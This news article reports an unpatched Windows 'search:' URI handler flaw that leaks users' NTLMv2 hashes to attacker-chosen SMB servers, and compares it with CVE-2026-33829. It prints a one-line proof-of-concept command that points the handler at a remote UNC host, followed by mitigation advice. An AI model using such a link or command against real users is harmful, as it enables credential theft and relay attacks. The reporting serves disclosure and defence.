Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user’s NTLMv2 hash to the attacker.
Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool’s ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.
CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.
“An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message,” Microsoft noted in its advisory at the time.
“If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker’s choosing, which would disclose the user’s NTLMv2 hash to the attacker, who could use this to authenticate as the user.”
Specifically, the problem had to do with the fact that the Snipping Tool’s URI handler accepted a “filePath” parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim’s Net-NTLMv2 hash to the attacker.
The newly discovered shortcoming achieves the same end goal using “search:” and “crumb=location:” instead of “filePath” using a command like below –
start "" "search:query=test&crumb=location:\10.0.1.100share"“It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating,” Huntress researcher Andrew Schwartz said. It’s worth noting that the use of a “crumb” parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.
As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating “only Important and Critical severity cases meet our bar for servicing.”
In the absence of a fix, it’s advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don’t need it, enforce SMB signing so that captured hashes can’t be relayed against internal services, and disable NTLM where applicable.
